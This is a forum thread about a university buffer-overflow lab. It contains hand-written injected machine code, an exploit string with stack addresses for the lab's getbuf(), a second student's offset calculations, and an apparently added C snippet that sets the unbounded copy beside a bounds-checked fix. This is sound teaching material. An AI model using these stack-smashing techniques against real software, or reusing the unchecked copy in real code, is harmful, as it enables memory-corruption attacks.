#1
Registered User, Devshed Newbie (0 - 499 posts). Joined Apr 2010; 5 posts; rep power 0.

    [Solved]Buffer overflow exploit


    Hello, first time posting here... and first time asking for help on homework... but I really can't figure this out.

    The problem is as follows: There is a program in C called bufbomb that takes in an argument for my team name and a string. It uses the team name to call another program makecookie which creates a 4 byte hex code cookie. The string is provided by another program sendstring, which takes in a line of hex bytes and turns it into a string. All of this is on a RH8 Linux machine with gcc.

    Inside bufbomb there's a function getbuf()
    Code:
    int getbuf(){
           char buf[12]; 
           Gets(buf);
           return 1;
    }
    The objective is for the string to cause an overflow and change the return address. I have successfully finished the first two parts in which you just had to change the return address to another function. Now I'm stuck in the next part.

    I have to provide an exploit string that will change the value of a variable to the value of my cookie and then call a certain function.

The variable is stored at 0x804a1bc, my cookie is 0x7b4bbfad, and the address of the function I need to go to is 0x8048d10.

    Code:
    movl    $0x7b4bbfad,0x804a1bc 
    pushl   $0x8048d10 
    ret
    When I assemble it and disassemble with objdump I get:
    Code:
    00000000 <.text>:
        0:	c7 05 bc a1 04 08 ad     movl   $0x7b4bbfad,0x804a1bc
        7:	bf 4b 7b
        a:	68 10 8d 04 08           push   $0x8048d10
        f:	c3                       ret
    Which tells me the exploit string should be "c7 05 bc a1 04 08 ad bf 4b 7b 68 10 8d 04 08" which is exactly the size of the buffer (overwriting %ebp). The address of the beginning of the buffer is 0xbfffb35c, so I tag on "5c b3 ff bf" to the end of the string. Now the return address has been overwritten to point to the beginning of the buffer and the exploit string takes up the entire buffer.

    From everything I've read and understood about the stack and buffer overflows, this should do the trick... however I'm getting a segmentation fault when getbuf() returns to 0xbfffb35c and it doesn't execute any of my code.

I also tried setting the code after the stack pointer and filling the buffer with random stuff and overwriting the return address to the beginning of the exploit string, and that didn't work either.

    This homework is due tomorrow and I've been smashing my head against the wall for a few hours now... Any help would be greatly appreciated!!
    Last edited by aiguofer; April 18th, 2010 at 08:02 PM. Reason: solved
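The page's getbuf() placed next to a bounds-checked version, as an added example that is not the lab's or the poster's code: the lab's Gets() is replaced by a constructed stand-in that takes the line as an argument instead of reading stdin, and overflow_bytes() reports how far a given line would run past the 12-byte buffer, which is exactly what turns an overlong sendstring line into a clobbered stack frame.

```c
#include <stddef.h>
#include <string.h>

/* Same buffer size as the page's getbuf(): char buf[12]. */
enum { BUFSZ = 12 };

/* Length of a line up to its newline or NUL (neither counted). */
static size_t line_len(const char *line) {
    size_t n = 0;
    while (line[n] != '\0' && line[n] != '\n')
        n++;
    return n;
}

/* The page's getbuf() with a constructed stand-in for the lab's Gets():
 * the line is passed in instead of read from stdin, and it is copied with
 * no bound, so a line of BUFSZ bytes or more writes past buf and, if long
 * enough, into the saved %ebp and return address. Only safe to call with
 * short lines; it is here to show the defect beside the fix. */
int getbuf_vulnerable(const char *line) {
    char buf[BUFSZ];
    size_t n = line_len(line);
    memcpy(buf, line, n);   /* no check against sizeof buf */
    buf[n] = '\0';
    return 1;
}

/* How many bytes an unbounded copy of `line` (plus its NUL) would land
 * beyond a BUFSZ-byte buffer; 0 means the line fits. */
size_t overflow_bytes(const char *line) {
    size_t need = line_len(line) + 1;
    return need > BUFSZ ? need - BUFSZ : 0;
}

/* Hardened getbuf(): checks the length before copying and refuses any
 * line that would not fit, so the frame can never be overwritten.
 * Returns 1 on success (as the original) and 0 when input is rejected. */
int getbuf_hardened(const char *line) {
    char buf[BUFSZ];
    size_t n = line_len(line);
    if (n + 1 > sizeof buf)
        return 0;
    memcpy(buf, line, n);
    buf[n] = '\0';
    return 1;
}
```

The 19-byte case in the test (15 bytes of code plus a 4-byte address, as in the post above) lands 8 bytes past the buffer, which is the width of a saved %ebp plus a return address on this 32-bit target.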
#2
Lord of Dorkness, Devshed Supreme Being (6500+ posts). Joined Jan 2004; Location: Central New York. Texan via Arizona, out of his element!; 8,524 posts; rep power 3319.
    We don't do homework. I don't teach cracking to strangers that come strolling down the pike.
    Functionality rules and clarity matters; if you can work a little elegance in there, you're stylin'.
    If you can't spell "u", "ur", and "ne1", why would I hire you? 300 baud modem? Forget I mentioned it.
#3
Registered User, Devshed Newbie (0 - 499 posts). Joined Apr 2010; 5 posts; rep power 0.
    Originally Posted by DaWei_M
    We don't do homework. I don't teach cracking to strangers that come strolling down the pike.
    Thank you for your very insightful and helpful reply.

    Comments on this post

    • DaWei_M disagrees : You're entirely welcome.
    • Joseph Taylor agrees
#4
Contributing User, Devshed Novice (500 - 999 posts). Joined Mar 2009; 837 posts; rep power 532.
    Step through the code in a debugger.
#5
Registered User, Devshed Newbie (0 - 499 posts). Joined Apr 2010; 5 posts; rep power 0.
    Thanks but I finally figured it out.... I had it right all along, the problem was that I was trying to run the exploit on my system instead of the lab computer. Apparently my system doesn't allow the stack to execute so when it returned to the stack it would seg fault. Good to know that newer systems are more secure!

    This was a very interesting homework, I'll definitely try to make my programs more secure from now on!
#6
Contributing User, Devshed Novice (500 - 999 posts). Joined Mar 2009; 837 posts; rep power 532.
    DEP to the rescue, as I suspected.

    I'm still not sure why you said "but" - a debugger would have gotten you your answer very quickly; at least you could have verified that you computed your relative addressing to the variable correctly and such.

    I just tend to see a real lack of debugging skills from today's CS people as compared to even 15 years ago.
#7
Registered User, Devshed Newbie (0 - 499 posts). Joined Apr 2010; 5 posts; rep power 0.
Oh yeah, I was stepping through it with gdb... that's how I figured out all the values and relationships between stack pointers and addresses... The thing is, as soon as it would hit the return statement it would give me a seg fault, even though the return address was pointing to the right place in the stack... However, I didn't really know why it was doing that... I guess I should have guessed it, but I was kind of burnt out on the whole thing and wasn't thinking straight anymore haha.

This class has definitely helped me out a lot in understanding pointers, stacks, how the computer interprets code, how to use gdb... This is probably the most interesting class I've taken so far. Next project is optimizing a program in Y86... should be interesting.
#8
Registered User, Devshed Newbie (0 - 499 posts). Joined Nov 2010; 2 posts; rep power 0.
    Hey, firstly sorry for re-activating an old thread, but I cannot send a private message to the user.

    Aiguofer, I have the same issue as you. I am heading over to the lab just now, but I wanted to ask you just to be sure how did you find the return address of your exploit code? - Meaning how did you figure out the memory address of where your exploit code is saved?

    Help would be greatly appreciated!
#9
Registered User, Devshed Newbie (0 - 499 posts). Joined Apr 2010; 5 posts; rep power 0.
    Originally Posted by blackle89
    Hey, firstly sorry for re-activating an old thread, but I cannot send a private message to the user.

    Aiguofer, I have the same issue as you. I am heading over to the lab just now, but I wanted to ask you just to be sure how did you find the return address of your exploit code? - Meaning how did you figure out the memory address of where your exploit code is saved?

    Help would be greatly appreciated!
Sorry... I actually don't remember that well. I think I just started looking at the contents of a few addresses before the stack pointer until I found it.
#10
Registered User, Devshed Newbie (0 - 499 posts). Joined Nov 2010; 2 posts; rep power 0.
    Thanks so much for replying!

    If you have some time could you help me out a little bit?


    Dump of assembler code for function getbuf:
    0x08048b20 <+0>: push %ebp
    0x08048b21 <+1>: mov %esp,%ebp
    0x08048b23 <+3>: sub $0x28,%esp
    0x08048b26 <+6>: lea -0x14(%ebp),%eax
    0x08048b29 <+9>: mov %eax,(%esp)
    0x08048b2c <+12>: call 0x8048990 <Gets>
    0x08048b31 <+17>: mov $0x1,%eax
    0x08048b36 <+22>: leave
    0x08048b37 <+23>: ret

That is my getbuf disassembly. I believe the string should be stored at the memory address -0x14(%ebp). This is 20 bytes away from ebp, and my disassembly byte code comes up to 16 bytes.

So I write those 16 bytes, add 4 bytes of padding, 4 more bytes of what?, and lastly the 4 bytes of the return address (which is hopefully -0x14(%ebp)).

    Yea?
    Anything coming back to you?

    I would really appreciate some help.
